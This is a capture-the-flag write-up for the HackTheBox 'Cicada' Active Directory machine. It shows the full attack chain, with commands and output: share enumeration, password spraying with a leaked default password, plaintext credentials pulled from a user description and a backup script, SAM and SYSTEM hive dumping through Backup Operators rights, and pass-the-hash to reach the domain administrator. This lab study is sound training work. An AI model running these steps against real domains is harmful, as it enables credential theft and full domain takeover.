Cicada

AD box on HTB.

Enumeration:

Port Scanning:

We will start with nmap scanning:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cicada]                                                                                                                       
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 10.129.136.252
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-10 20:06 +03
Nmap scan report for 10.129.136.252                                                                                                                      20:11:28 [245/535]
Host is up, received echo-reply ttl 127 (0.17s latency).                                                                                                                   
Scanned at 2025-09-10 20:06:08 +03 for 203s                                                                                                                                
Not shown: 65522 filtered tcp ports (no-response)                                    
PORT      STATE SERVICE       REASON          VERSION                                                                                                                      
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus                                                                                                              
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-11 00:07:06Z)                                                               
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC                                                                                                        
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn                                                                                                
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)                                
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb                                                                                                                       
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb                                                                        
| Issuer: commonName=CICADA-DC-CA/domainComponent=cicada                                                                                                                   
| Public Key type: rsa                                                                                                                                                     
| Public Key bits: 2048                                                                                                                                                    
| Signature Algorithm: sha256WithRSAEncryption                                                                                                                             
| Not valid before: 2024-08-22T20:24:16                                                                                                                                    
| Not valid after:  2025-08-22T20:24:16                                                                                                                                    
| MD5:   9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65                                                                                                                           
| SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a                                                                                                                 
| -----BEGIN CERTIFICATE-----                                                                                                                                              
<snipped>
|_-----END CERTIFICATE-----
|_ssl-date: 2025-09-11T00:08:56+00:00; +7h00m01s from scanner time.
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-11T00:08:57+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA/domainComponent=cicada
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after:  2025-08-22T20:24:16
| MD5:   9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
| SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
| -----BEGIN CERTIFICATE-----
<snipped>
|_-----END CERTIFICATE-----
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-11T00:08:56+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA/domainComponent=cicada
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after:  2025-08-22T20:24:16
| MD5:   9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
| SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
| -----BEGIN CERTIFICATE-----
<snipped>                                                 
|_-----END CERTIFICATE-----                                                          
3269/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA/domainComponent=cicada
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after:  2025-08-22T20:24:16
| MD5:   9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
| SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
| -----BEGIN CERTIFICATE-----
<snipped>
|_-----END CERTIFICATE-----
|_ssl-date: 2025-09-11T00:08:57+00:00; +7h00m02s from scanner time.
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
65364/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

<snipped>
|_clock-skew: mean: 7h00m01s, deviation: 0s, median: 7h00m01s
<snipped>

<snipped>

So this is an active directory domain controller.

Lets get the domain and the hostname of the target domain controller:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cicada]
└─$ netexec smb 10.129.136.252
SMB         10.129.136.252  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)

Add it to the hosts file:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cicada]
└─$ cat /etc/hosts                                                              
127.0.0.1       localhost
127.0.1.1       kali
<snipped>

10.129.136.252 CICADA-DC.cicada.htb cicada.htb CICADA-DC

Also I will sync the time with the target machine if we needed to interact with kerberos nearly:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cicada]
└─$ sudo ntpdate 10.129.136.252
2025-09-11 04:19:57.180875 (+0300) +25201.460337 +/- 0.074793 10.129.136.252 s1 no-leap
CLOCK: time stepped by 25201.460337

We can view the available shares with guest session:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cicada]                                                                                                                       
└─$ netexec smb cicada-dc.cicada.htb -u 'guest' -p '' --shares                                                                                                             
SMB         10.129.136.252  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)              
SMB         10.129.136.252  445    CICADA-DC        [+] cicada.htb\guest:                                                                                                  
SMB         10.129.136.252  445    CICADA-DC        [*] Enumerated shares                                                                                                  
SMB         10.129.136.252  445    CICADA-DC        Share           Permissions     Remark                                                                                 
SMB         10.129.136.252  445    CICADA-DC        -----           -----------     ------                                                                                 
SMB         10.129.136.252  445    CICADA-DC        ADMIN$                          Remote Admin                                                                           
SMB         10.129.136.252  445    CICADA-DC        C$                              Default share                                                                          
SMB         10.129.136.252  445    CICADA-DC        DEV                                                                                                                    
SMB         10.129.136.252  445    CICADA-DC        HR              READ                                                                                                   
SMB         10.129.136.252  445    CICADA-DC        IPC$            READ            Remote IPC                                                                             
SMB         10.129.136.252  445    CICADA-DC        NETLOGON                        Logon server share                                                                     
SMB         10.129.136.252  445    CICADA-DC        SYSVOL                          Logon server share

We can see that we have read permissions on the hr share.

Using impacket-smbclient we can enumerate that share to find what files it contains:

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Cicada/smb]                                                                                                                       
└─$ impacket-smbclient cicada.htb/guest@10.129.136.252                                                                                                                     
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies                                                                                                 
                                                                                                                                                                           
Password:                                                                                                                                                                  
Type help for list of commands                                                                                                                                             
# shares                                                                                                                                                                   
ADMIN$                                                                                                                                                                     
C$                                                                                   
DEV                                                                                                                                                                        
HR                                                                                                                                                                         
IPC$                                                                                                                                                                       
NETLOGON                                                                                                                                                                   
SYSVOL                                                                                                                                                                     
# use hr                                                                                                                                                                   
# ls                                                                                                                                                                       
drw-rw-rw-          0  Fri Mar 15 09:26:17 2024 .                                                                                                                          
drw-rw-rw-          0  Thu Mar 14 15:21:29 2024 ..                                                                                                                         
-rw-rw-rw-       1266  Wed Aug 28 20:31:48 2024 Notice from HR.txt                                                                                                                                                                                                                                                        
# get Notice from HR.txt                                                                                                                                                   
# exit

Only one file that is note from hr team:

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Cicada/smb]                                                                                                                       
└─$ cat Notice\ from\ HR.txt                                                                                                                                               
                                                                                                                                                                           
Dear new hire!                                                                                                                                                             
                                                                                                                                                                           
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something uniq
ue and secure.                                                                                                                                                             
                                                                                                                                                                           
Your default password is: Cicada$M6Cor************                                                                                                                         
                                                                                                                                                                           
To change your password:                                                                                                                                                   
                                                                                                                                                                           
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.                                                              
2. Once logged in, navigate to your account settings or profile settings section.                                                                                          
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special cha
racters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp

We have a default password, we can dump the users with --rid-brute option of netexec:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cicada]                                                                                                                       
└─$ netexec smb cicada-dc.cicada.htb -u 'guest' -p '' --rid-brute                                                                                                          
SMB         10.129.136.252  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)              
SMB         10.129.136.252  445    CICADA-DC        [+] cicada.htb\guest:                                                                                                  
SMB         10.129.136.252  445    CICADA-DC        498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)                                                     
SMB         10.129.136.252  445    CICADA-DC        500: CICADA\Administrator (SidTypeUser)
SMB         10.129.136.252  445    CICADA-DC        501: CICADA\Guest (SidTypeUser)
SMB         10.129.136.252  445    CICADA-DC        502: CICADA\krbtgt (SidTypeUser)
SMB         10.129.136.252  445    CICADA-DC        512: CICADA\Domain Admins (SidTypeGroup)
SMB         10.129.136.252  445    CICADA-DC        513: CICADA\Domain Users (SidTypeGroup)
SMB         10.129.136.252  445    CICADA-DC        514: CICADA\Domain Guests (SidTypeGroup)
SMB         10.129.136.252  445    CICADA-DC        515: CICADA\Domain Computers (SidTypeGroup)
SMB         10.129.136.252  445    CICADA-DC        516: CICADA\Domain Controllers (SidTypeGroup)
SMB         10.129.136.252  445    CICADA-DC        517: CICADA\Cert Publishers (SidTypeAlias)
SMB         10.129.136.252  445    CICADA-DC        518: CICADA\Schema Admins (SidTypeGroup)
SMB         10.129.136.252  445    CICADA-DC        519: CICADA\Enterprise Admins (SidTypeGroup)
SMB         10.129.136.252  445    CICADA-DC        520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB         10.129.136.252  445    CICADA-DC        521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.136.252  445    CICADA-DC        522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.129.136.252  445    CICADA-DC        525: CICADA\Protected Users (SidTypeGroup)
SMB         10.129.136.252  445    CICADA-DC        526: CICADA\Key Admins (SidTypeGroup)
SMB         10.129.136.252  445    CICADA-DC        527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB         10.129.136.252  445    CICADA-DC        553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB         10.129.136.252  445    CICADA-DC        571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.129.136.252  445    CICADA-DC        572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.129.136.252  445    CICADA-DC        1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB         10.129.136.252  445    CICADA-DC        1101: CICADA\DnsAdmins (SidTypeAlias)
SMB         10.129.136.252  445    CICADA-DC        1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB         10.129.136.252  445    CICADA-DC        1103: CICADA\Groups (SidTypeGroup)
SMB         10.129.136.252  445    CICADA-DC        1104: CICADA\john.smoulder (SidTypeUser)
SMB         10.129.136.252  445    CICADA-DC        1105: CICADA\sarah.dantelia (SidTypeUser)
SMB         10.129.136.252  445    CICADA-DC        1106: CICADA\michael.wrightson (SidTypeUser)
SMB         10.129.136.252  445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser)
SMB         10.129.136.252  445    CICADA-DC        1109: CICADA\Dev Support (SidTypeGroup)
SMB         10.129.136.252  445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)

Get the usernames only:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cicada]
└─$ cat temp.txt | grep SidTypeUser | awk '{print $6}' | cut -d '\' -f 2 > users.txt

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cicada]
└─$ cat users.txt                                                                                                                                                          
Administrator
Guest
krbtgt
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars

I will use kerbrute to perform password spraying:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cicada]
└─$ kerbrute passwordspray users.txt 'Cicada$M6Corpb*@Lp#nZp!8' --dc cicada-dc.cicada.htb -d cicada.htb

    __             __               __      
   / /_____  _____/ /_  _______  __/ /____  
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                         

Version: v1.0.3 (9dad6e1) - 09/11/25 - Ronnie Flathers @ropnop

2025/09/11 03:25:19 >  Using KDC(s):
2025/09/11 03:25:19 >   cicada-dc.cicada.htb:88

2025/09/11 03:25:20 >  [+] VALID LOGIN:  michael.wrightson@cicada.htb:Cicada$M6Corpb*@Lp#nZp!8
2025/09/11 03:25:20 >  Done! Tested 9 logins (1 successes) in 1.390 seconds

And we still have one user with the default password.

BloodHound:

Collect the domain data with bloodhound-python:

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Cicada/bloodhound]                                                                                                                
└─$ sudo bloodhound-python -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -ns 10.129.136.252 -d cicada.htb -dc cicada-dc.cicada.htb -c all                           
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)                                                                                                         
INFO: Found AD domain: cicada.htb                                                                                                                                          
INFO: Getting TGT for user                                                                                                                                                 
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)                              
INFO: Connecting to LDAP server: cicada-dc.cicada.htb                                                                                                                      
INFO: Found 1 domains                                                                                                                                                      
INFO: Found 1 domains in the forest                                                                                                                                        
INFO: Found 1 computers                                                                                                                                                    
INFO: Connecting to LDAP server: cicada-dc.cicada.htb                                                                                                                      
INFO: Found 9 users                                                                                                                                                        
INFO: Found 54 groups                                                                                                                                                      
INFO: Found 3 gpos                                                                                                                                                         
INFO: Found 2 ous                                                                                                                                                          
INFO: Found 19 containers                                                                                                                                                  
INFO: Found 0 trusts                                                                                                                                                       
INFO: Starting computer enumeration with 10 workers                                                                                                                        
INFO: Querying computer: CICADA-DC.cicada.htb                                                                                                                              
INFO: Done in 00M 50S

Start bloodhound, and upload the data we collected to it:

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Cicada/bloodhound]                                                                                                                
└─$ sudo bloodhound                                                                                                                                                        
                                                                                                                                                                           
 Starting neo4j                                                                      
Neo4j is running at pid 20694                                                                                                                                              
                                                                                                                                                                           
 Bloodhound will start

 IMPORTANT: It will take time, please wait...


 opening http://127.0.0.1:8080
<snipped>

I did not find anything useful as michael.wrightson, but we can find that if we compromised emily.oscars that is part of Backup Operators group, we can backup the sam database, and the system hive registry:

Lateral Movement to david.orelious:

I will try to get the users descriptions, because sometimes it contains some sensitive data, like user's password:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cicada]
└─$ netexec ldap cicada-dc.cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -M get-desc-users
LDAP        10.129.136.252  389    CICADA-DC        [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
LDAP        10.129.136.252  389    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
GET-DESC... 10.129.136.252  389    CICADA-DC        [+] Found following users: 
GET-DESC... 10.129.136.252  389    CICADA-DC        User: Administrator description: Built-in account for administering the computer/domain
GET-DESC... 10.129.136.252  389    CICADA-DC        User: Guest description: Built-in account for guest access to the computer/domain
GET-DESC... 10.129.136.252  389    CICADA-DC        User: krbtgt description: Key Distribution Center Service Account
GET-DESC... 10.129.136.252  389    CICADA-DC        User: david.orelious description: Just in case I forget my password is aRt$Lp#7t*VQ!3

So we will have another credentials.

Privilege Escalation:

Backup Operators:

Lets go back to the shares again, because there was one share that we did not have access to it:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cicada]
└─$ netexec smb cicada-dc.cicada.htb -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares      
SMB         10.129.136.252  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False) 
SMB         10.129.136.252  445    CICADA-DC        [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3 
SMB         10.129.136.252  445    CICADA-DC        [*] Enumerated shares
SMB         10.129.136.252  445    CICADA-DC        Share           Permissions     Remark
SMB         10.129.136.252  445    CICADA-DC        -----           -----------     ------
SMB         10.129.136.252  445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.129.136.252  445    CICADA-DC        C$                              Default share
SMB         10.129.136.252  445    CICADA-DC        DEV             READ            
SMB         10.129.136.252  445    CICADA-DC        HR              READ            
SMB         10.129.136.252  445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.129.136.252  445    CICADA-DC        NETLOGON        READ            Logon server share 
SMB         10.129.136.252  445    CICADA-DC        SYSVOL          READ            Logon server share

Now we have read permissions on the dev share as david.orelious, lets authenticate to that share and check if there was any interesting data:

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Cicada/smb]
└─$ smbclient //10.129.136.252/dev -U 'david.orelious@cicada.htb%aRt$Lp#7t*VQ!3'      
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Mar 14 15:31:39 2024
  ..                                  D        0  Thu Mar 14 15:21:29 2024
  Backup_script.ps1                   A      601  Wed Aug 28 20:28:22 2024

                4168447 blocks of size 4096. 478768 blocks available
smb: \> get Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (0.8 KiloBytes/sec) (average 0.8 KiloBytes/sec)
smb: \> exit

We will find out a backup script that contains plain-text password for emily.oscars user:

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Cicada/smb]
└─$ cat Backup_script.ps1                                                      

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

As shown in bloodhound enumeration we did that emily.oscars is member of Remote Management Users and Backup Operators groups, which allows us to authenticate via WinRM, and backup the sam and system hive registries:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cicada]                                                                                                                       
└─$ evil-winrm -i 10.129.136.252 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'                                                                                                     
                                                                                                                                                                           
Evil-WinRM shell v3.7                                                                                                                                                      
                                                                                                                                                                           
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline                                           
                                                                                                                                                                           
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                      
                                                                                                                                                                           
Info: Establishing connection to remote endpoint                                                                                                                           
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\sam sam                                                                                              
The operation completed successfully.                                                                                                                                      
                                                                                                                                                                           
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\system system                                                                                        
The operation completed successfully.

Then we can download both of them using the download functionality of evil-winrm:

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download sam                                                                                                       
                                                                                                                                                                           
Info: Downloading C:\Users\emily.oscars.CICADA\Documents\sam to sam                                                                                                        
                                                                                                                                                                           
Info: Download successful!                                                                                                                                                 
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download system                                                                                                    
                                                                                                                                                                           
Info: Downloading C:\Users\emily.oscars.CICADA\Documents\system to system                                                                                                  
                                                                                                                                                                           
Info: Download successful!

Now we can dump sam data with impacket-secretsdump:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cicada]                                 
└─$ impacket-secretsdump -sam sam -system system local                                                                                                                     
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies                                                                                                 
                                                                                                                                                                           
[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620                                                                                                              
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)                                                                                                                       
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::                                                                                     
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::                                                                                             
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::                                                                                    
[*] Cleaning up...

If we checked the administrator hash with netexec:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cicada]                                                                                                                       
└─$ netexec smb cicada-dc.cicada.htb -u administrator -H 2b87e7c93a3e8a0ea4a581937016f341                                                                                  
SMB         10.129.136.252  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)              
SMB         10.129.136.252  445    CICADA-DC        [+] cicada.htb\administrator:2b87e7c93a3e8a0ea4a581937016f341 (Pwn3d!)

We will find that the local administrator has the same hash as the domain admin administrator.

So we can authenticate via WinRM for example:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cicada]
└─$ evil-winrm -i 10.129.136.252 -u administrator -H 2b87e7c93a3e8a0ea4a581937016f341
                                                                                     
Evil-WinRM shell v3.7                                                                
                                                                                     
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                                                                     
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                                                                     
Info: Establishing connection to remote endpoint                                                                                                                           
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cicada\administrator                                                                                                                                                       
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname                          
CICADA-DC        
*Evil-WinRM* PS C:\Users\Administrator\Documents> ipconfig
                                                                                     
Windows IP Configuration                                                                                                                                                   
                                                                                                                                                                           
                                                                                     
Ethernet adapter Ethernet0:         
                                          
   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::324:625e:dac3:38b3
   Link-local IPv6 Address . . . . . : fe80::97ab:bac3:c0d:e7ab%6
   IPv4 Address. . . . . . . . . . . : 10.129.136.252
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f8ec%6                    
                                       10.129.0.1

And we can get the flags:

*Evil-WinRM* PS C:\Users> type C:\Users\Administrator\Desktop\root.txt
dd2ae5d8b143504347bbda76ca1bcc7c                                                     
*Evil-WinRM* PS C:\Users> type C:\Users\emily.oscars.cicada\Desktop\user.txt                                                                                               
397350d069970a4f85efa566ce714f88

PreviousBlackfield NextEscape

Last updated 5 months ago

hashtagEnumeration:

hashtagPort Scanning:

hashtagBloodHound:

hashtagLateral Movement to david.orelious:

hashtagPrivilege Escalation:

hashtagBackup Operators: